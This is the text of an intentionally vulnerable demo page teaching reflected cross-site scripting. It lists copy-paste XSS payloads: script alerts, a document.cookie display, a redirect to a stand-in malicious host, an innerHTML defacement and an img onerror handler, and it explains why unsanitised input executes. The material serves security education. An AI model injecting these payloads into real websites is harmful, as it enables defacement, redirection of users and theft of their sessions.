🚨 Vulnerable Search Page - Reflected XSS

Warning: This page is intentionally vulnerable for educational purposes!
Real websites should NEVER implement search like this.

Search Products:

🔥 Try these XSS payloads (copy and paste in search box):

Basic Alert:

<script>alert('XSS Attack!')</script>

Cookie Theft:

<script>alert('Your cookies: ' + document.cookie)</script>

URL Redirection:

<script>window.location='https://malicious-site.com'</script>

DOM Manipulation:

<script>document.body.innerHTML='<h1>Website Hacked!</h1>'</script>

Image with Error Handler:

<img src="invalid" onerror="alert('XSS via image error!')">

🎯 What's happening here?

1. User input directly inserted into HTML without sanitization

2. innerHTML property executes any JavaScript code

3. No validation or encoding of special characters

4. Immediate execution as soon as page renders